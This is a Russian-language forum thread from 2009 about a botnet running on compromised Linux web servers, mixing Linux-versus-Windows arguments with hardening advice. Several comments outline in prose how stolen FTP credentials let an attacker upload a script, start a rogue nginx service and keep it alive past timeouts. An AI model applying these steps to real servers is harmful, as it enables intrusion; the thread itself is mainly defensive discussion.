    "но почему-то ботнет крутится на линуксе" - ботнет наверняка работает и на виндовых серверах. Просто они не слишком популярны и такой хостинг только под дотнетчиков пользуют. Основная проблема в сабже - кривые популярные php-движки, крайне востребованные у виндузятнегов. И безопасность у таких сайтов как положено на винде - на честного человека.

     
     
  • 3.65, аноним (?), 20:20, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    так всегда
    когда нет аргументов, проще зачистить тему
     
  • 2.41, Logo (ok), 18:59, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    > Покажите мне вебмастеров под линуксом, все на винде сидят.

    Не все, но Вы правы. Мучаются, ламаються, изворачиваються, но сидят под виндой и корчат из себя великого профи.

     
  • 2.77, XoRe (ok), 22:32, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    gt оверквотинг удален Просто есть дыры в ПО, а есть дыры в ОС Если дыры в ПО,... текст свёрнут, показать
     
  • 2.91, Casufi (??), 00:41, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    [quote]Да, линукс не при чем, но почему-то ботнет крутится на линуксе. Админы указывают на вебмастеров, что поставили дырявый wordpress, а вебмастерам по большому без разницы, не их задача заботится о безопасности серверов и обновлять этот самый вордпресс.[/quote]
    Тупой и бесполезный троллинг.
    Дураку дай хоть виндовс хоть линукс, все сломает. Дурак как правило выбирает виндовс, потому что там есть возможность меньше извилинами шевелить.
    Умный человек прочитав этот пост подумает чего ему нужно сделать чтобы прикрыть эту уязвимость на своем сервере, а судя по описанию для этого не нужно ждать никаких патчей, просто нужно иметь голову и руки не из жопы, дурак начнет тролить.
     
  • 2.110, charon (ok), 11:51, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >> Админы указывают на вебмастеров, что поставили дырявый wordpress, а вебмастерам по большому без разницы, не их задача заботится о безопастности серверов и обновлять этот самый вордпресс.

    ААхахаха, ЛОЛ. Да, это админы должны патчить вордпрессы. То есть на сервере хостинга 100 сайтов с вордпрессом (допустим), на каждом свои извращённые плагины и админ должен всё бросить и обновить 100 вордпрессов, а потом проверить совместимость плагинов с новой версией? Что вы такое курите вообще?
    Если вебмастерам без разницы, то их сайт заражается, а админы просто блокируют его нафиг. Вот так дела делаются в нашем мире, уважаемый.

     
  • 2.186, anonymous (??), 14:12, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >все дальше думать не надо. А SELinux обычно мешает, поэтому вырубается
    >в числе первых, привет гентуводам.

    ага. «мешает». а мозг таким оключателям череп не распирает, интересно? такие же и UAC отрубают, а потом пищат, что «троянов нахватались». и сидят под админом/рутом, «патамуша пад прастым юзирам ниудобна, тварь я дражащия али права имею?!»

     

  • 1.30, дядя (?), 17:33, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Linux? Казалось бы, причем тут ядро?
     
     
  • 2.37, klalafuda (?), 18:37, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/

    боюсь, что само слово 'Linux' - это уже сто лет как не ядро. это название достаточно разлапистого и, что греха таить, популярного в своих кругах бренда. подвод же всех под один монастырь - это лишь плата за популярность.

    // wbr

     
     
  • 3.45, Logo (ok), 19:07, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >... и, что греха таить, популярного в своих кругах бренда.

    И, что греха таить, Linux, это что-то особенное и недостижимое для многих, многих, многих... в кругах  виновса :))) И этим беднягам остается только огрызаться на недостижимую ОС.

     
     
  • 4.68, Аноним Анонимович (?), 20:53, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >И, что греха таить, Linux, это что-то особенное и недостижимое для многих, многих, многих... в кругах  виновса :))) И этим беднягам остается только огрызаться на недостижимую ОС.

    И, что греха таить, для многих из тех, кому кажется, что они постигли Linux, остаются непостижимыми многие многие другие ОСи. Эти бедняги способны сравнивать Linux только с Виндами, находясь при этом под воздействием виндовых же стереотипов. Поэтому им и кажется, что Linux самая лучшая в мире ОСь.

     
     
  • 5.87, Logo (ok), 00:11, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >И, что греха таить, для многих из тех, кому кажется, что они
    >постигли Linux, остаются непостижимыми многие многие другие ОСи. Эти бедняги способны
    >сравнивать Linux только с Виндами, находясь при этом под воздействием виндовых
    >же стереотипов. Поэтому им и кажется, что Linux самая лучшая в
    >мире ОСь.

    Ну естественно, есть и такие, но это ведь нас с Вами не касается ;)))

     

  • 1.38, Ъ (?), 18:40, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >На входящих в ботнет хостах, в дополнение к основному http-серверу, на 8080 порту запущен дополнительный http-сервер nginx

    Никому не кажется, что это полный бред?

    Пеар никому не известной конторы.

     
     
  • 2.42, Zenitur (?), 19:00, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >>На входящих в ботнет хостах, в дополнение к основному http-серверу, на 8080 порту запущен дополнительный http-сервер nginx
    >
    >Никому не кажется, что это полный бред?
    >
    >Пеар никому не известной конторы.

    Может быть... Когда во дворе рядом с деревянным домом вдруг появляется многоэтажка - это кажется невозможным.

     
     
  • 3.54, Ъ (?), 19:40, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Один сервер, специально настроенный на раздачу "заразы" не может быть ботнетом по определению.
     
     
  • 4.103, Zenitur (?), 11:17, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Меня другое удивляет. Неужели брызжущие слюной комментаторы не видят, что никто из отписавшихся, кроме двух, ВОООБЩЕ не боится, что на его сервере это есть?! Разве не очевидно, что то, что они говорят - правда?
     
     
  • 5.112, charon (ok), 11:54, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Меня другое удивляет. Неужели брызжущие слюной комментаторы не видят, что никто из
    >отписавшихся, кроме двух, ВОООБЩЕ не боится, что на его сервере это
    >есть?! Разве не очевидно, что то, что они говорят - правда?
    >

    ну почему же никто? Боимся. Я проверил на своих.

     
     
  • 6.130, Zenitur (?), 13:19, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Я же говорю - кроме двоих отписавшихся все уверены в своих серверах.
    А значит, кривые руки. Ну разве случайно забытый ключ от бронированной двери рядом с бронированной дверью означает, что дверь плохая?
     
  • 5.147, тоже Аноним (?), 16:13, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    А вы уверены, что у многих комментаторов под опекой сервер с WordPress'ом?
    У меня, например, он не используется. Однако проверил, какие страницы выдает мой сайт.
    iframe, как и положено, один - битриксовский для внутреннего использования ;)
     
  • 5.187, anonymous (??), 14:17, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Меня другое удивляет. Неужели брызжущие слюной комментаторы не видят, что никто из
    >отписавшихся, кроме двух, ВОООБЩЕ не боится, что на его сервере это
    >есть?! Разве не очевидно, что то, что они говорят - правда?

    а чего бояться-то? веб-сервак сидит себе в отдельной группе под отдельным юзером. все ненужные права файрволом прикрыты. закачаные бинари ему особо позапускать не удастся. к тому же в кроне сидит спецназ и мониторит систему, поднимая вопль и расчехляя пушку, если вдруг мимо воробей пролетел. и, конечно, никакого ftp, только sftp. и смены паролей. и ещё куча всего.

    так что чего бояться, если всё под контролем?

     
     
  • 6.188, anonymous (??), 14:17, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    s/ненужные права/ненужные порты/

    selffxd.

     
  • 2.43, Logo (ok), 19:02, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Никому не кажется, что это полный бред?
    >Пеар никому не известной конторы.

    Не знаю, не знаю, не въехал в суть, но слишком подозрительно сделан акцент на nginx

     
     
  • 3.70, Pilat (ok), 21:01, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    nginx есть во многих дистрибутивах готовый, его можно скачать - он маленький, и конфигурировать его легко, и нагрузку незаметно держит, и почти всегда всё равно запущен - незаметен в списке процессов. В общем, для данного использования идеальный сервер.
     

  • 1.51, ро (?), 19:24, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    одмины нынче не знают про firewall ?

     
  • 1.62, DFX (?), 20:05, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    "Поражение троянским ПО одной из клиенских _windows_-машин"

    вообще всё это безобразие - продолжение темы http://it.slashdot.org/story/09/07/13/142210/RIP-FTP , с той лишь разницей что какой-то "специалист в безопасности" (понятно должно быть - безопасности чего и где) решил посчитать количество упоминания слова "linux" в идентификаторе веб-сервера и потыкать пальчиком.

    но кого это волнует когда можно просто содрать новость со slashdot и покормить местных троллей? один вон уже лопается

     
     
  • 2.66, Антон (??), 20:33, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Загрузка malware через ворованные FTP пароли уже года 3-4 как прослеживается. Но с тем, что представлено сейчас разница огромная, если раньше просто закачивали на сайты затрояненные html страницы, то теперь грузят на сервер часть кода для обеспечения работы ботнета, т.е. переносится функциональность с троянов на стороне клиентов, на сторону сервера. И самое важное - все это делается на автомате, без ручного участия.  Меня только удивляет зачем грузить nginx, когда можно было все более красиво и незаметно через троянский PHP-скрипт устроить, и проблема с неработой на отличных от Linux системах при этом решилась бы. Хотя догадываюсь, на эти серверные точки сливается и внешний троянский трафик и запатченный nginx самое то для такой нагрузки.
     
     
  • 3.67, Square (ok), 20:40, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –4 +/
    gt оверквотинг удален Главное - отработать технологию Улучшить можно и потом ... текст свёрнут, показать
     
     
  • 4.71, Pilat (ok), 21:04, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Это демонстрация того, что можно легко использовать дыры в php. Непонятно одно - всё-таки сервера администрируются, в отличии от пользовательских машин, и паразитная активность должна быстро замечаться, а почему-то не обнаруживается. Возможно, время жизни аких ботнетов или их размер сильно завышены.
     
     
  • 5.90, Casufi (??), 00:41, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Это демонстрация того, что можно легко использовать дыры в php. Непонятно одно
    >- всё-таки сервера администрируются, в отличии от пользовательских машин, и паразитная
    >активность должна быстро замечаться, а почему-то не обнаруживается. Возможно, время жизни
    >аких ботнетов или их размер сильно завышены.

    Админ админу рознь, тупых и ленивых увальней и в линуксовом саппорте хватает, а VPS нынче может позволить себе практически каждый.

     
  • 5.189, anonymous (??), 14:19, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >- всё-таки сервера администрируются

    дадада, Firefox'ом, мы знаем.

     
  • 4.78, XoRe (ok), 22:33, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >[оверквотинг удален]
    >>делается на автомате, без ручного участия.  Меня только удивляет зачем
    >>грузить nginx, когда можно было все более красиво и незаметно через
    >>троянский PHP-скрипт устроить, и проблема с неработой на отличных от Linux
    >>системах при этом решилась бы. Хотя догадываюсь, на эти серверные точки
    >>сливается и внешний троянский трафик и запатченный nginx самое то для
    >>такой нагрузки.
    >
    >Главное - отработать технологию. Улучшить можно и потом. В данном случае важным
    >элементом является построение ботнета на линуксе, использование новой технологии, демонстрация что
    >"оно работает", демонстрация того что линукс - это неуловимый джо.

    То есть, если веб сервер с дырявым wordpress работает на Windows, то можно не бояться? =)

     

  • 1.75, Админ Веня (?), 22:27, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Ссылки к новости:
    OpenNews: На суперкомпьютере MegaTux будет запущено 1 млн. копий Wine
    это там бот-нет "испытывают"?:)
     
     
  • 2.107, hhg (ok), 11:29, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    да. и изучают поведение вирусов.
     

  • 1.79, XoRe (ok), 22:41, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Из новости можно сделать вывод:
    Безопасность зависит от многих факторов.
    Linux - один из них.
    Дырявый wordpress - точно такой же фактор в этом списке =)

    И если уделять внимание безопасности, то уделять всем факторам.
    Одним постоянным обновлением ядра Linux тут не обойдешься.

    А вообще получается, что репутация Linux (и вообще *nix), как защищенной системы, страдает.
    И страдает именно изза дырявых сервисов, которые на ней запущены.
    Поэтому не следить за сервисами - это даже рискованнее, чем не обновлять систему.
    Скрипткиддисы и боты чаще используют уязвимости сервисов, чем системы.

     
     
  • 2.82, Pilat (ok), 23:25, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Тут ещё одно Линукс, в отличии от Windows, содержит в любом дистрибутиве массу ... текст свёрнут, показать
     
     
  • 3.108, Аноним (-), 11:33, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > новый способ производства зомбированных компьютеров позволяет очень короткими скриптовыми языками добиться выдачи сотен страниц в секунду

    Для того, что бы это было опасно нужно, что бы за этими страничками к заражённому компьютеру обращались.

    > В общем, линукс-сообщество вовремя не опомнится и не начнёт уделять безопасности больше внимания, наступит линуксокапец.

    Если покинуть криокамеру, можно заметить, что есть и SELinux, и chroot, и ещё несколько вариантов ограничения функционала для некоторых пользователей/приложений. О безопасности должны думать те, кто эксплуатирует ПО, а разработчики уже давно "чешутся".

     
     
  • 4.144, Pilat (ok), 14:24, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Если покинуть криокамеру, можно заметить, что есть и SELinux, и chroot, и
    >ещё несколько вариантов ограничения функционала для некоторых пользователей/приложений. О безопасности должны
    >думать те, кто эксплуатирует ПО, а разработчики уже давно "чешутся".

    Если подумать головой, chroot не поможет от описанного типа внедрения ботнет-агентов. Если ограничивть функционал, тогда администрировать сервера будет дорого.

    Разработчики не чешутся. Пример - сколько CMS'ок перешли на использование переменных в SQL запросах (binding placeholders). А половина если не больше проблем отсюда и идёт.

     
  • 3.114, charon (ok), 11:57, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Кстати, недавно где-то пролетало обсуждение - ставить или нет файрвол на сервер.
    >Наверно, теперь придётся ставить и разрешать только то что не запрещено
    >в обязательном порядке.

    Ну там же было сказано, что целесообразность фаервола надо оценивать в каждом конкретном случае. На веб-серверах ставить обязательно.

     
  • 3.140, XoRe (ok), 14:02, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Я вам производительный отдачик вирусов под любой ОС сделаю, хоть под DOS (если под него найдется веб сервер) =)

    Конечно, что в Linux есть много программ, которые можно использовать со злым умыслом.
    Их и в windows достаточно.
    DDoS можно сделать даже простым telnet'ом.
    Например, запустить его на 10 000 машинах и подключаться к 80 порту одного сервера)
    Поэтому бороться с этим уменьшением функционала не получится.
    А ответственность есть всегда.
    Но ответственность есть за конкретные действия, а не за использование потенциально опасных средств.

     
     
  • 4.191, anonymous (??), 14:21, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >хоть под DOS
    >(если под него найдется веб сервер) =)

    был, был какой-то. и даже не один. гуглить лень. %-)

     
  • 3.190, anonymous (??), 14:20, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Тут ещё одно. Линукс, в отличии от Windows, содержит в любом дистрибутиве
    >массу интересных программ — кирпичиков, в том числе nginx.

    десять минут изо всех сил искал у себя в слаке ngnix. не нашёл. аффтар — врун.

     

  • 1.80, Loafer (??), 22:59, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Отключите в винде все сервисы и будет вам безопасная нафик не нужная ось :)
     
     
  • 2.85, SDenis (??), 23:35, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Сабж свидетельствует о том, что Линукс становится основной платформой для веб-серсиов.
    Взломан ворд-пресс, а не ОС.
    Винузятники, пейте яд.

     

  • 1.95, cryptoanonymous (?), 06:54, 14/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ага на Линукс локальных уязвимостей не существует, удаленных тоже бай дизайн. А если существуют то это кривые руки. Treo должен завидовать :)) ыыы
     
  • 1.98, rw9uaq (??), 10:08, 14/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "Паразиты без маски" (с)
     
  • 1.109, буба (?), 11:48, 14/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Этот WordPress настолько дыряв, что дает получить права рута для установки/запуска ngnix и открытия порта 8080?
     
     
  • 2.115, charon (ok), 12:00, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Этот WordPress настолько дыряв, что дает получить права рута для установки/запуска ngnix
    >и открытия порта 8080?

    Не только вордпресс. Кривой вебмастер - самая большая проблема. Достаточно просто увести у него пароль от фтп и залить СВОИ скрипты независимо от того, Вордпресс там у него, Друпал или вообще пустой веб-сайт с одной статической HTML-страничкой.

     
     
  • 3.116, буба (?), 12:12, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Вряд ли украденный пароль фтп-аккаунта дает полномочия, с которыми  можно установить, сконфигурироваль и запустить левый сервис, фаирвол переконфигурировать и т.д. Это намного страшнее, чем "залить свои скрипты" на какой-нибудь занюханный виртуал-хост.
     
     
  • 4.118, charon (ok), 12:24, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Вряд ли украденный пароль фтп-аккаунта дает полномочия, с которыми  можно установить,
    >сконфигурироваль и запустить левый сервис, фаирвол переконфигурировать и т.д. Это намного
    >страшнее, чем "залить свои скрипты" на какой-нибудь занюханный виртуал-хост.

    Похоже, вы невнимательно читали текст заметки. Зачем фаервол переконфигурить?
    Запустить левый сервис - запросто. Заливаете, например, свой cgi-скрипт, потом через http://сервер/скрипт запускаете его - и вауля, сервис работает.

     
     
  • 5.120, аноним (?), 12:42, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >и вауля, сервис работает

    от 20 до 60 секунд как правило

     
     
  • 6.124, charon (ok), 13:05, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>и вауля, сервис работает
    >
    >от 20 до 60 секунд как правило

    А если создать новую группу процессов? А если в at?

     
     
  • 7.125, аноним (?), 13:12, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >А если создать новую группу процессов? А если в at?

    а если устроить ярмарку и раздавать всем прохожим root-аккаунты?
    дырявая ось + кривые руки, иначе не бывает

     
  • 6.138, XoRe (ok), 13:52, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>и вауля, сервис работает
    >
    >от 20 до 60 секунд как правило

    Это уже в зависимости от настроек веб сервера.
    Если скрипт выдает что-то и закрывает stdout, веб сервер считает, что скрипт закончил работу)
    Кроме того, всегда есть способы получить отдачу даже от этих 20 - 60 секунд.

     
  • 6.192, anonymous (??), 14:23, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>и вауля, сервис работает
    >от 20 до 60 секунд как правило

    за это время можно до Канады добежать, не то что только понаделать форков и позапускать over 9000 программ.

     
  • 5.126, буба (?), 13:12, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Погодите, я внимательно читал текст заметки. Там написано, что дополнительно к основному http-серверу запускается дополнительный http-сервер, а именно ngnix, и именно на порту 8080. Это значит, что ngnix сначала нужно установить и сконфигуриировать. И порт 8080 открыть, если он закрыт фаирволом (а по умолчанию iptables работает почти везде).
     
     
  • 6.134, charon (ok), 13:38, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Погодите, я внимательно читал текст заметки. Там написано, что дополнительно к основному
    >http-серверу запускается дополнительный http-сервер, а именно ngnix, и именно на порту
    >8080. Это значит, что ngnix сначала нужно установить и сконфигуриировать. И
    >порт 8080 открыть, если он закрыт фаирволом (а по умолчанию iptables
    >работает почти везде).

    Если закрыт фаерволом, то всё ок. Здесь говорится про сервера, где незакрыт.
    А сконфигурировать nginx - не проблема. Установить - это скопировать по фтп файлы? А как запустить - я описал выше.

     
  • 4.137, XoRe (ok), 13:49, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Установить, сконфигурировать и запустить сервис - попахивает windows-терминоло... текст свёрнут, показать
     
     
  • 5.139, буба (?), 13:59, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Да, все понятно теперь, спасибо за ликбез. Ясно, что линух к этим уязвимостям имеет такое же отношение, как погода к синоптикам. Все те же пхп-дырки
     
  • 5.176, Денис Юсупов (?), 13:13, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Вот чтобы такого не было, достаточно просто запретить в php ini соответствующие ... текст свёрнут, показать
     
     
  • 6.193, anonymous (??), 14:24, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Вот чтобы такого не было, достаточно просто запретить в php.ini соответствующие команды:

    ага. чтобы пользователь не порезался, надо оторвать ему руки. и ноги — на всякий случай.

     
     
  • 7.198, Dyr (ok), 16:13, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>Вот чтобы такого не было, достаточно просто запретить в php.ini соответствующие команды:
    >
    >ага. чтобы пользователь не порезался, надо оторвать ему руки. и ноги —
    >на всякий случай.

    У вас PHP использует эти вызовы? Для чего, позвольте узнать?
    Если так уж надо, то определить php_value на уровне директорий ещё никто не мешал.

     
     
  • 8.199, anonymous (??), 16:24, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    например, для рисования морды от гита а также для многих других приятных вещей ... текст свёрнут, показать
     
     
  • 9.200, Dyr (ok), 18:22, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Он рисует морду не в usr local www cgi-bin Многие другие приятные вещи выби... текст свёрнут, показать
     
     
  • 10.201, anonymous (??), 19:20, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    вообще-то он зовёт git через popen и парзит его вывод потому что это единственн... текст свёрнут, показать
     
     
  • 11.202, Dyr (ok), 19:46, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще-то у GIT есть cgi-модуль, которые написан на perl http git or cz gitwi... текст свёрнут, показать
     
     
  • 12.203, Dyr (ok), 19:47, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    И вообще веб-морд дофига http git or cz gitwiki InterfacesFrontendsAndTools W... текст свёрнут, показать
     
     
  • 13.205, anonymous (??), 19:55, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    так у меня ж не просто stand-alone рожа там интеграция и с багтрэком, и с викой... текст свёрнут, показать
     
  • 12.204, anonymous (??), 19:52, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    во-первых, он уродливый во-вторых, он на перле и в нулевых он тоже зовёт гит ... текст свёрнут, показать
     
  • 2.133, XoRe (ok), 13:37, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Этот WordPress настолько дыряв, что дает получить права рута для установки/запуска ngnix
    >и открытия порта 8080?

    Чтобы nginx запустился, его не нужно "устанавливать".
    Достаточно положить и запустить с нужным конфигом.
    Чтобы открыть порт 8080, тоже прав рута не надо.

    Все сводится к "можно много чего сделать и без рута", если не настроены ограничения.

     
     
  • 3.141, буба (?), 14:05, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Я слишком усложнил себе жизнь, сравнив этот nginx с апаче, а оно как томкет оказывается.
     

     ....большая нить свёрнута, показать (24)

  • 1.111, Erepb (??), 11:53, 14/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    А еще можно купить в контору хороший сейф, раздать ключи сотрудникам и при пропаже денег заявить на изготовителя этого сейфа.

    Ждем массового паломничества на Win-сервера.

     
     
  • 2.121, XoRe (ok), 12:44, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >А еще можно купить в контору хороший сейф, раздать ключи сотрудникам и
    >при пропаже денег заявить на изготовителя этого сейфа.
    >
    >Ждем массового паломничества на Win-сервера.

    То есть на виндовых серверах wordpress резко становится сверхзащищенным? =)

     
     
  • 3.122, Erepb (??), 12:50, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >То есть на виндовых серверах wordpress резко становится сверхзащищенным? =)

    Еще каким! Когда есть винсервер - зачем какая-то мелочь, вроде вордпресса? ;-)

     
     
  • 4.135, XoRe (ok), 13:39, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>То есть на виндовых серверах wordpress резко становится сверхзащищенным? =)
    >
    >Еще каким! Когда есть винсервер - зачем какая-то мелочь, вроде вордпресса? ;-)
    >

    Ну я как бы не спорю)
    Просто тут народ на фразу "поломали wordpress на linux" сразу реагируют "ага, поломали linux!".

     
     
  • 5.142, Erepb (??), 14:21, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >сразу реагируют

    Это говорит о популярности Linux. И почему бы им просто не перейти на нее? А кому нужны более веские аргументы, пожалуйста: вы сэкономите средства, как свои (конторы, семьи, друзей и пр.), так и страны в целом. Опять же, зачастую можно услышать фразы, типа "надо делать работу", "некогда заниматься ерундой"... ИМХО: человек обязан развиваться и учиться всю жизнь. Иначе будут забываться даже нужные окна для проставления галочек.

     

  • 1.113, буба (?), 11:55, 14/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет не поднимают по простой причине - винда не справляется с нагрузкой )))
     
     
  • 2.148, тоже Аноним (?), 16:23, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
    >не поднимают по простой причине - винда не справляется с нагрузкой

    Скорее - на винду не ставят WordPress, так как она и с этой-то нагрузкой не справляется ;)

     
  • 2.149, Pilat (ok), 16:28, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
    >не поднимают по простой причине - винда не справляется с нагрузкой
    >)))

    Почему не справляется? Под windows nginx какой-то другой?

     
     
  • 3.153, XoRe (ok), 18:06, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
    >>не поднимают по простой причине - винда не справляется с нагрузкой
    >>)))
    >
    >Почему не справляется? Под windows nginx какой-то другой?

    В nginx можно указать разные методы обработки соединений:
    http://sysoev.ru/nginx/docs/events.html

    select и poll - стандартные.
    Остальные (kqueue, epoll, rt signals, event ports) - более быстрые.
    По сути, они и создавались для того, чтобы использовать что-то более быстрое, чем select.

    Так вот.
    В windows только и есть, что select.
    Сам Сысоев пишет, что особой производительности ждать не стоит:
    http://sysoev.ru/nginx/docs/windows.html

    Другими словами - мощь современных способов обработки соединений в nginx просто недоступна в Windows.
    Но представители Microsoft все равно гордо заявляли, что "теперь nginx доступен и под Windows, что позволяет строить высокопроиводительные серверы и на этой платформе!" =)

     
     
  • 4.155, аноним (?), 18:17, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    не перекручивай.
    как бы там ни было, написано, что _пока_ высокой производительности ждать не стоит
     
     
  • 5.210, XoRe (ok), 22:41, 24/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >не перекручивай.
    >как бы там ни было, написано, что _пока_ высокой производительности ждать не
    >стоит

    Короче полностью цитата:
    "В качестве метода обработки соединений используется select, поэтому не стоит ожидать высокой производительности и масштабируемости: пока это бета-версия."

    Ну а если по теме, то select остается select'ом.
    Если Сысоев добьется стабильности и масштабирования, то респект ему.
    Если он сможет ещё и что-то придумать с производительностью, то респект ему вдвойне.
    Ведь когда разработчики системы сами кладут на производительность, то чтобы добиваться быстродействия - это надо быть мастером)

     
  • 3.195, anonymous (??), 14:26, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Почему не справляется? Под windows nginx какой-то другой?

    под виндой ядро и tcp «какие-то другие».

     
  • 3.211, XoRe (ok), 22:42, 24/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
    >>не поднимают по простой причине - винда не справляется с нагрузкой
    >>)))
    >
    >Почему не справляется? Под windows nginx какой-то другой?

    Да кстати, как тут заметили ниже, под windows TCP/IP стек тоже веселый.
    Я бы сказал, кастрированный)

     
     
  • 4.212, Pilat (ok), 23:32, 24/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
    >>>не поднимают по простой причине - винда не справляется с нагрузкой
    >>>)))
    >>
    >>Почему не справляется? Под windows nginx какой-то другой?
    >
    >Да кстати, как тут заметили ниже, под windows TCP/IP стек тоже веселый.
    >
    >Я бы сказал, кастрированный)

    Тут налицо маленькое непонимание. Нет никакой супернагрузки! Когда звучит слово 'nginx', мы считаем, что идёт речь о тысячах запросов, но это не так. В данном ботнете nginx использовался просто как стандартный быстрый web сервер, который везде есть и который не надо подгружать извне, можно использовать готовый. Он выбран не из-за скоростных характеристик. Конечно, он быстрый и это хорошо, но он очень избыточен для задач раздачи троянцев - троянец маленький и может быть втиснут в несколько пакетов по полтора килобайта и отдавать его можно очень быстро и без nginx, и почти без tcpip - для пары пакетов tcpip можно считать аналогом udp с хорошим приближением.

    Да, кстати. Насчёт "на виндах этот ботнет не поднимают по простой причине - винда не справляется с нагрузкой" - может никто не заметил, но ботнеты, как правило, работают именно на виндах и с нагрузкой она справляется великолепно.

     

  • 1.150, Buy (?), 16:34, 14/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >а по умолчанию iptables работает почти везде

    По _умолчанию_ не работает почти нигде.

     
     
  • 2.196, anonymous (??), 14:26, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>а по умолчанию iptables работает почти везде
    >По _умолчанию_ не работает почти нигде.

    работает. но не настроен. с точки зрения юзера, правда, разницы нет. %-)

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    Слёрм
